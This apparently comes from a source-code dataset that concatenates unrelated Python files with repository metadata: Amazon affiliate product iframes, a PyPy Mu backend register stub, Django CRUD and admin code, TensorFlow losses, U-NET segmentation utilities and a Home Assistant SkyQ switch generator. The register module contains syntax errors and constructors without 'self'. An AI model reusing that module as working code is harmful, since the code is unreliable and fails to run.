src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNNWRG2&asins=B07YNNWRG2&linkId=6562ae45153f506125539da5db2a1c88&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-6 / com Chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP8PZY&asins=B07YNP8PZY&linkId=e5a699a49050cb41ea609aa2da3c7b9c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-4 / com chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP9W2F&asins=B07YNP9W2F&linkId=3761746cc169a8fbc77f3dc03ff038be&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["SparkPRO-2 / com Chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNP28WB&asins=B07YNP28WB&linkId=ad5e56fbd4512989a14b8e027e563078&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Digital Air Fuel Meter", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPG5VJ&asins=B07YNPG5VJ&linkId=51856d246ec0c66ae6e44cc19eb04622&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Wide Band O2 Meter Nano/Com chicote de 2m", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPBHQ8&asins=B07YNPBHQ8&linkId=6f5bf549a5debfd2e0c5c76701de9616&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Clamper - Br / 2M", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07YNPMYCG&asins=B07YNPMYCG&linkId=9920e774c7bb1a8380a1f90ef2979fee&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Turbina Upgrade (400cv) Jetta Fusca 211cv Ea888 3a Geração", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B0888SGZ4D&asins=B0888SGZ4D&linkId=c7f08d7ec0a82f64a790b8a7708a5e92&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["CONJ CENTRAL TURBINA - AUDI Q5 2.0 TSI EA888-200/211CV", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B083JKT1BH&asins=B083JKT1BH&linkId=4035edc7c5054dbb65e6f48f5009c7ac&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "automotivo"], ["Echo Dot (3ª Geração): Smart Speaker com Alexa - Cor Preta", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07PDHSJ1H&asins=B07PDHSJ1H&linkId=f2fec788a0432b623bd85426817d0d3e&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Echo (3ª geração) - Smart Speaker com Alexa - Cor Azul", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07TZLF17T&asins=B07TZLF17T&linkId=34f0600d7d789a5141429a14233e4bab&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Novo Echo Dot (4ª Geração): Smart Speaker com Alexa - Cor Azul", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B084KV8YRR&asins=B084KV8YRR&linkId=4a032d7efa13b15d6c4c55fa05a02b7b&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Novo Fire TV Stick Lite com Controle Remoto Lite por Voz com Alexa | Streaming em Full HD | Modelo 2020", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07ZZW745X&asins=B07ZZW745X&linkId=a3ea569a7df70e9e4e4b6d49365f616a&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Sonoff® T2 Us Interruptor Wifi Inteligente 3 Botões Touth Screen Wi-fi & Rf 433 Mhz, Funciona com Alexa", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07XRTNDNX&asins=B07XRTNDNX&linkId=f2fa5f01a0b48f660f452dd6ed593b9c&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Sonoff® T2 Us Interruptor Wifi Inteligente 2 Botões Touth Screen Wi-fi & Rf 433 Mhz, Funciona com Alexa", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07XRVN4ZK&asins=B07XRVN4ZK&linkId=12b2fa5290bcf58826fe920710104133&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], [" Sonoff TX3 Interruptor Wifi, 3 Botões, Touch Screen, Funciona com Alexa - Preto", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B0848PQMFL&asins=B0848PQMFL&linkId=16f1e8bf3b2b80c7774e4a5d4cfe14fe&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Sonoff basic- automação residencial", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B077D3P9J2&asins=B077D3P9J2&linkId=5744ead441d0f693cb901403f6420e29&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Interruptor Inteligente Sonoff, 4 Canais, Funciona com Alexa", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B07CZZB5VF&asins=B07CZZB5VF&linkId=2d80d47cb4459757e201e388174c0615&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Smart Controle Universal, Positivo Casa Inteligente, concentre todos os controles remotos no seu celular, Compatível com Alexa Smart Controle Universal", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B085RNT8B9&asins=B085RNT8B9&linkId=a35cf940e71c66383bb0705f52c9e577&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"], ["Smart Plug Max Wi-Fi", '<iframe style="width:120px;height:240px;" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="//ws-na.amazon-adsystem.com/widgets/q?ServiceVersion=20070822&OneJS=1&Operation=GetAdHtml&MarketPlace=BR&source=ac&ref=tf_til&ad_type=product_link&tracking_id=esteeuquero-20&marketplace=amazon®ion=BR&placement=B084J6Y2JF&asins=B084J6Y2JF&linkId=f1f38a453cbab525ee3c70c88e92ca88&show_border=false&link_opens_in_new_window=true&price_color=333333&title_color=0066c0&bg_color=ffffff"> </iframe>', "iot"]]
return(prod)
| 5,050.8 | 25,197 | 0.818405 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 24,918 | 0.984745 |
cdcc403733cc344ed109e0132f133aabd50b5dc1 | 1,213 | py | Python | rpython/jit/backend/muvm/registers.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
]
| null | null | null | rpython/jit/backend/muvm/registers.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
]
| null | null | null | rpython/jit/backend/muvm/registers.py | wdv4758h/mu-client-pypy | d2fcc01f0b4fe3ffa232762124e3e6d38ed3a0cf | [
"Apache-2.0",
"OpenSSL"
]
| null | null | null | """ Modified version of ../muvm/registers.py. Will update as needed.
"""
#from rpython.jit.backend.arm.locations import VFPRegisterLocation
#from rpython.jit.backend.arm.locations import SVFPRegisterLocation
#from rpython.jit.backend.arm.locations import RegisterLocation
from rpython.jit.metainterp.history import (Const, ConstInt, ConstFloat,
ConstPtr,
INT, REF, FLOAT)
registers = []
vfpregisters = []
svfpregisters = []
all_regs = []
all_vfp_regs = vfpregisters[]
argument_regs = caller_resp = []
callee_resp = []
callee_saved_registers = callee_resp
callee_restored_registers = callee_resp
vfp_argument_regs = caller_vfp_resp = []
svfp_argument_regs = []
callee_vfp_resp = []
callee_saved_vfp_registers = callee_vfp_resp
class Reg(object):
""" Default register type. """
type = None
size = 0
val = None
class IntReg(Reg):
type = INT
def __init__(size = None, val = None):
self.size = size
self.val = val
class FPReg(Reg):
type = FLOAT
def __init__(size = None, val = None):
assert size in (None, 32, 64)
self.size = size
self.val = val
| 25.270833 | 72 | 0.650453 | 385 | 0.317395 | 0 | 0 | 0 | 0 | 0 | 0 | 298 | 0.245672 |
cdcc7612e16b3989892d1765ee8591ffd8c61843 | 1,536 | py | Python | src/database/CRUD/create.py | gregory-chekler/api | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | [
"MIT"
]
| 2 | 2020-07-24T12:58:17.000Z | 2020-12-17T02:26:13.000Z | src/database/CRUD/create.py | gregory-chekler/api | 11ecbea945e7eb6fa677a0c0bb32bda51ba15f28 | [
"MIT"
]
| 214 | 2019-06-26T17:33:54.000Z | 2022-03-26T00:02:34.000Z | src/database/CRUD/create.py | massenergize/portalBackEnd | 7ed971b2be13901667a216d8c8a46f0bed6d6ccd | [
"MIT"
]
| 6 | 2020-03-13T20:29:06.000Z | 2021-08-20T16:15:08.000Z | """
This file contains code to post data from the database. This is meant to
centralize the insertion of data into the database so that multiple apps can
call on the methods in this file without having to define their own
and to prevent code redundancy.
"""
from ..models import *
from ..utils.common import ensure_required_fields
from ..utils.create_factory import CreateFactory
def new_action(args):
factory = CreateFactory(Action, args)
return factory.create(Action, args)
def new_community(args):
factory = CreateFactory(Community, args)
return factory.create()
def new_event(args):
factory = CreateFactory(Event, args)
return factory.create()
def new_user_profile(args):
factory = CreateFactory(UserProfile, args)
return factory.create(UserProfile, args)
def new_location(args):
factory = CreateFactory(Location, args)
return factory.create()
def new_subscriber(args):
factory = CreateFactory(Subscriber, args)
return factory.create(Subscriber, args)
def new_billing_statement(args):
factory = CreateFactory(BillingStatement, args)
return factory.create(BillingStatement, args)
def new_slider(args):
factory = CreateFactory(Slider, args)
return factory.create(Slider, args)
def new_menu(args):
factory = CreateFactory(Menu, args)
return factory.create(Menu, args)
def new_page_section(args):
factory = CreateFactory(PageSection, args)
return factory.create(PageSection, args)
def new_page(args):
factory = CreateFactory(Page, args)
return factory.create(Page, args)
| 25.180328 | 76 | 0.76888 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 259 | 0.16862 |
cdccadfab450a4e9a57ce9f5439e430bde2038d3 | 527 | py | Python | tfutils/losses/losses.py | njchiang/tf-keras-utils | 6ea5e51ef3ca5729fbc71bf3cffecf4faec033dd | [
"MIT"
]
| null | null | null | tfutils/losses/losses.py | njchiang/tf-keras-utils | 6ea5e51ef3ca5729fbc71bf3cffecf4faec033dd | [
"MIT"
]
| null | null | null | tfutils/losses/losses.py | njchiang/tf-keras-utils | 6ea5e51ef3ca5729fbc71bf3cffecf4faec033dd | [
"MIT"
]
| null | null | null | # this actually won't work with keras... not exactly a keras utility
import tensorflow as tf
def ae_loss_fn(model, x, y, training=None):
pred = model(x, training)
mse = tf.keras.losses.MSE(y, pred)
return tf.reduce_mean(mse), pred
# function is untested
def vae_loss_fn(model, x, y, training=None):
z, m, v = model.encoder(x, training)
pred = model.decoder(z)
mse = tf.reduce_sum(tf.keras.losses.MSE(y, pred))
kld = -0.5 * tf.reduce_sum(1 + v - tf.pow(m, 2) - tf.exp(v))
return mse + kld, pred | 35.133333 | 68 | 0.660342 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 90 | 0.170778 |
cdccf6c01653163bb8ca38561bfba641eb360f29 | 834 | py | Python | src/data_generator/vocab_builder.py | luciencho/jddc_solo | efddf0885d5e3c640835874f70d57d25123de141 | [
"BSD-3-Clause"
]
| null | null | null | src/data_generator/vocab_builder.py | luciencho/jddc_solo | efddf0885d5e3c640835874f70d57d25123de141 | [
"BSD-3-Clause"
]
| null | null | null | src/data_generator/vocab_builder.py | luciencho/jddc_solo | efddf0885d5e3c640835874f70d57d25123de141 | [
"BSD-3-Clause"
]
| null | null | null | # coding:utf-8
from __future__ import unicode_literals
from __future__ import division
from __future__ import print_function
import os
from src.utils import utils
from src.data_generator import vocabulary
def process(hparam):
utils.raise_inexistence(hparam.tmp_dir)
tokenizer = vocabulary.Tokenizer(segment=hparam.segment)
all_data = []
paths = [os.path.join(hparam.tmp_dir, 'train_q.txt'),
os.path.join(hparam.tmp_dir, 'train_a.txt'),
os.path.join(hparam.tmp_dir, 'dev_q.txt'),
os.path.join(hparam.tmp_dir, 'dev_a.txt')]
vocab_path = os.path.join(hparam.tmp_dir, '{}.vcb'.format(hparam.vocab_size))
for path in paths:
utils.raise_inexistence(path)
all_data += utils.read_lines(path)
tokenizer.build_vocab(all_data, hparam.vocab_size, vocab_path)
| 33.36 | 81 | 0.713429 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 70 | 0.083933 |
cdd4efc2e23f55bb4467b8c8df8e0d1cdd72fa3d | 419 | py | Python | xas/queries/elastic.py | neuromore/msgxc | e74565a7991d80e5951ef22452521bcbca27fc92 | [
"Apache-2.0"
]
| 1 | 2020-03-30T22:14:21.000Z | 2020-03-30T22:14:21.000Z | xas/queries/elastic.py | neuromore/msgxc | e74565a7991d80e5951ef22452521bcbca27fc92 | [
"Apache-2.0"
]
| 12 | 2020-04-15T00:00:49.000Z | 2022-02-27T01:26:08.000Z | xas/queries/elastic.py | neuromore/msgxc | e74565a7991d80e5951ef22452521bcbca27fc92 | [
"Apache-2.0"
]
| 4 | 2020-01-16T11:29:38.000Z | 2020-04-03T09:43:40.000Z | from elasticsearch import Elasticsearch
# TODO: Not implemented yet
es = Elasticsearch(["localhost"], sniff_on_connection_fail=True, sniffer_timeout=60)
def threads_all():
res = es.search(index="mthreads", body={"query": {"match_all": {}}})
print("Got %d Hits:" % res['hits']['total'])
# for hit in res['hits']['hits']:
# print("%(timestamp)s %(author)s: %(text)s" % hit["_source"])
return res | 38.090909 | 84 | 0.649165 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 192 | 0.458234 |
cdd5f8ad7b2f42d4bfe80a22a6bf9fc481e565ca | 2,750 | py | Python | U-NET/utils.py | HarshZ26/Object-Detection | 1d73f6aeb7452b0b26bd2713e69f340d129a5ba5 | [
"MIT"
]
| 1 | 2022-03-23T15:49:02.000Z | 2022-03-23T15:49:02.000Z | U-NET/utils.py | HarshZ26/Object-Detection | 1d73f6aeb7452b0b26bd2713e69f340d129a5ba5 | [
"MIT"
]
| null | null | null | U-NET/utils.py | HarshZ26/Object-Detection | 1d73f6aeb7452b0b26bd2713e69f340d129a5ba5 | [
"MIT"
]
| null | null | null | from init import *
VOC_CLASSES = [
"background",
"aeroplane",
"bicycle",
"bird",
"boat",
"bottle",
"bus",
"car",
"cat",
"chair",
"cow",
"diningtable",
"dog",
"horse",
"motorbike",
"person",
"potted plant",
"sheep",
"sofa",
"train",
"tv/monitor",
]
VOC_COLORMAP = [
[0, 0, 0],
[128, 0, 0],
[0, 128, 0],
[128, 128, 0],
[0, 0, 128],
[128, 0, 128],
[0, 128, 128],
[128, 128, 128],
[64, 0, 0],
[192, 0, 0],
[64, 128, 0],
[192, 128, 0],
[64, 0, 128],
[192, 0, 128],
[64, 128, 128],
[192, 128, 128],
[0, 64, 0],
[128, 64, 0],
[0, 192, 0],
[128, 192, 0],
[0, 64, 128],
]
palette = np.array(VOC_COLORMAP)
custom_transforms = [transforms.Normalize(mean=[-0.485, -0.456,-0.406], std=[1/0.229, 1/0.224,1/0.225])]
inv_trans = torchvision.transforms.Compose(custom_transforms)
transform = A.Compose([A.Resize(512,512),
A.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),ToTensorV2()
])
def calculate_weight(loader):
weight_map = torch.zeros(21)
for i,(_,mask) in enumerate(loader):
mask = mask.permute(0,3,1,2)
index,counts = torch.unique(torch.argmax(mask,axis = 1),sorted = True,return_counts=True)
for i in range(len(index)):
weight_map[index[i]] = counts[i]
weight_map = (mask.size(2)*mask.size(3)*len(loader))/(weight_map)
return weight_map/21
def calculate_acc(grnd,predicted):
grnd = torch.argmax(grnd,axis = 1)
predicted = torch.argmax(predicted,axis = 1)
x = torch.eq(grnd,predicted).int()
acc= torch.sum(x)/(grnd.size(1)*grnd.size(1))
return acc
def collate_fn(batch):
data = [] #filled with 64 elements thorugh for loops
target = []
for item in batch: #batch = 64 items list one item = [image,label]
im = item[0]
open_cv_image = np.array(im)
open_cv_image = open_cv_image.copy()
transformed = transform(image=open_cv_image,mask = item[1])
im = transformed['image']
mask = transformed['mask']
data.append(im)
target.append(mask)
target = torch.stack(target,dim =0)
data = torch.stack(data,dim=0)
return [data, target]
def test_img(loader):
tes_img = iter(loader)
images,masks = tes_img.next()
print("images",images.size())
print("labels",masks.size())
print(np.shape(images))
img = images[0].squeeze()
img = inv_trans(img)
img = img.numpy()
im2display = img.transpose((1,2,0))
grnd_mask = masks.numpy().transpose[0]
a1 = np.argmax(grnd_mask,axis = 2)
g_mask = palette[a1]
plt.imshow(im2display, interpolation='nearest')
plt.imshow(g_mask)
| 25.229358 | 105 | 0.577818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 299 | 0.108727 |
cdd753cdba3af6ee31cf0c550e2ee7e5c881ebc9 | 2,898 | py | Python | custom_components/skyq/classes/switchmaker.py | TomBrien/Home_Assistant_SkyQ_MediaPlayer | 50f9ad0d3b7a3bc2acc652415ff59740bf3ace10 | [
"MIT"
]
| null | null | null | custom_components/skyq/classes/switchmaker.py | TomBrien/Home_Assistant_SkyQ_MediaPlayer | 50f9ad0d3b7a3bc2acc652415ff59740bf3ace10 | [
"MIT"
]
| null | null | null | custom_components/skyq/classes/switchmaker.py | TomBrien/Home_Assistant_SkyQ_MediaPlayer | 50f9ad0d3b7a3bc2acc652415ff59740bf3ace10 | [
"MIT"
]
| null | null | null | """
A utility function to generate yaml config for SkyQ media players.
To support easy usage with other home assistant integrations, e.g. google home
"""
import os.path as _path
import yaml
from ..const import CONST_ALIAS_FILENAME
class Switch_Maker:
"""The Switchmaker Class."""
def __init__(self, config_dir, entity_id, room, channels):
"""Initialise the Switchmaker."""
self._entity_id = entity_id
self._room = room
self._root = config_dir
if self._root[-1] != "/":
self._root += "/"
self._f = open(
self._root + "skyq" + self._room.replace(" ", "") + ".yaml", "w+"
)
if _path.isfile(self._root + CONST_ALIAS_FILENAME):
aliasfile = open(self._root + CONST_ALIAS_FILENAME, "r")
self._alias = yaml.full_load(aliasfile)
aliasfile.close()
self._addSwitch("pause", "pause", "media_pause")
self._addSwitch("play", "play", "media_play")
self._addSwitch("ff", "fastforward", "media_next_track")
self._addSwitch("rw", "rewind", "media_previous_track")
dedup_channels = list(dict.fromkeys(channels))
for ch in dedup_channels:
self._addSwitch(ch, ch, "select_source", True)
self._f.close()
def _addSwitch(self, switch, friendly_name, service, source=False):
"""Add switch to switches."""
source_switch = switch.replace("'", "''")
if self._alias:
friendly_name = self._findAlias(friendly_name)
else:
friendly_name = friendly_name.replace("'", "")
switch_name = (
"skyq_"
+ switch.replace(" ", "")
.replace("'", "")
.replace("+", "_")
.replace(".", "")
.replace("!", "")
.replace(":", "_")
.replace("/", "_")
.lower()
+ self._room.replace(" ", "").lower()
)
source_name = ""
if source:
source_name = " source: '" + source_switch + "'\n"
self._f.write(
" "
+ switch_name
+ ":\n"
+ " value_template: '{{\"off\"}}'\n"
+ " friendly_name: '"
+ friendly_name
+ " in the "
+ self._room
+ "'\n"
+ " turn_on:\n"
+ " service: media_player."
+ service
+ "\n"
+ " data:\n"
+ " entity_id: "
+ self._entity_id
+ "\n"
+ source_name
+ " turn_off:\n"
+ " service: script.placeholder\n"
)
def _findAlias(self, friendly_name):
try:
alias = self._alias[friendly_name]
except KeyError:
alias = friendly_name
return alias
| 30.1875 | 78 | 0.493444 | 2,661 | 0.918219 | 0 | 0 | 0 | 0 | 0 | 0 | 745 | 0.257074 |
cdd78b4b371ac658a03d1638d8afdbda0805a759 | 24,528 | py | Python | datawinners/accountmanagement/admin.py | ICT4H/dcs-web | fb0f53fad4401cfac1c1789ff28b9d5bda40c975 | [
"Apache-2.0"
]
| 1 | 2015-11-02T09:11:12.000Z | 2015-11-02T09:11:12.000Z | datawinners/accountmanagement/admin.py | ICT4H/dcs-web | fb0f53fad4401cfac1c1789ff28b9d5bda40c975 | [
"Apache-2.0"
]
| null | null | null | datawinners/accountmanagement/admin.py | ICT4H/dcs-web | fb0f53fad4401cfac1c1789ff28b9d5bda40c975 | [
"Apache-2.0"
]
| null | null | null | # vim: ai ts=4 sts=4 et sw=4 encoding=utf-8
import datetime
import logging
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserChangeForm
from django.core.exceptions import ValidationError
from django.forms import CharField
from django.utils.translation import ugettext_lazy as _
from django.contrib import admin
from django.contrib.auth.models import User, Group
from django_digest.models import PartialDigest
from django.contrib import messages
from django.utils.safestring import mark_safe
from django.contrib.admin.views.main import ChangeList
from datawinners.common.admin.utils import get_text_search_filter, get_admin_panel_filter
from datawinners.project.submission.export import create_excel_response
from datawinners.search.index_utils import get_elasticsearch_handle
from forms import forms
from datawinners.accountmanagement.models import OrganizationSetting, SMSC, PaymentDetails, MessageTracker, Organization, NGOUserProfile, OutgoingNumberSetting
from mangrove.form_model.field import ExcelDate
from mangrove.utils.types import is_empty, is_not_empty
from datawinners.countrytotrialnumbermapping.models import Country, Network
from datawinners.utils import get_database_manager_for_org
from datawinners.feeds.database import feeds_db_for
from django.db.models import Q
admin.site.disable_action('delete_selected')
class DatawinnerAdmin(admin.ModelAdmin):
def has_delete_permission(self, request, obj=None):
return False
def has_add_permission(self, request):
return False
class OrganizationSettingAdmin(DatawinnerAdmin):
list_display = ('organization_name', 'organization_id', 'type', 'payment_details', 'activation_date', 'admin_email')
fields = ('sms_tel_number', 'outgoing_number')
search_fields = ['organization__name','organization__org_id']
ordering = ('-organization__active_date',)
def organization_name(self, obj):
return obj.organization.name
organization_name.admin_order_field = "organization__name"
def _get_ngo_admin(self, organization_setting):
user_profiles = NGOUserProfile.objects.filter(org_id=organization_setting.organization.org_id)
admin_users = [x.user for x in user_profiles if x.user.groups.filter(name="NGO Admins")]
#right now there is only one ngo admin
return admin_users[0] if is_not_empty(admin_users) else NullAdmin()
def admin_email(self, obj):
return self._get_ngo_admin(obj).email
def organization_id(self, obj):
return obj.organization.org_id
organization_id.admin_order_field = "organization__org_id"
def payment_details(self, obj):
organization = obj.organization
payment_details = PaymentDetails.objects.filter(organization=organization)
if not is_empty(payment_details):
return payment_details[0].preferred_payment
return "--"
def type(self, obj):
return obj.organization.account_type
type.admin_order_field = 'organization__account_type'
def activation_date(self, obj):
return obj.organization.active_date if obj.organization.active_date is not None else '--'
activation_date.admin_order_field = "organization__active_date"
activation_date.short_description = "Created on"
class MessageTrackerAdmin(DatawinnerAdmin):
list_display = ("organization_name", "organization_id","type", "month", "combined_total_incoming",
"total_incoming_per_month", "total_messages", "total_outgoing_messages", "outgoing_sms_count","outgoing_sms_charged_count",
"sent_reminders_count","sent_reminders_charged_count", "send_message_count","send_message_charged_count", "sms_api_usage_count","sms_api_usage_charged_count", "sms_submission", "incoming_sp_count",
"incoming_web_count", "sms_registration_count")
search_fields = ['organization__name', 'organization__org_id', 'month']
ordering = ('-month',)
def __init__(self, *args, **kwargs):
super(MessageTrackerAdmin, self).__init__(*args, **kwargs)
self.list_display_links = (None,)
def organization_name(self, obj):
return obj.organization.name
organization_name.short_description = mark_safe('Organisation<br/>name')
def type(self,obj):
return obj.organization.account_type
def organization_id(self, obj):
return obj.organization.org_id
organization_id.short_description = mark_safe('Organisation<br/>ID')
def combined_total_incoming(self, obj):
return obj.total_incoming_in_total()
combined_total_incoming.short_description = mark_safe('Total<br/>incoming<br/>Submissions<br/>(In total)')
def total_incoming_per_month(self, obj):
return obj.total_monthly_incoming_messages()
total_incoming_per_month.short_description = mark_safe('Total<br/>Incoming<br/>Submissions<br/>')
def current_month(self, obj):
return datetime.datetime.strftime(obj.month, "%m-%Y")
current_month.short_description = "Month"
def total_outgoing_messages(self, obj):
return obj.outgoing_message_count()
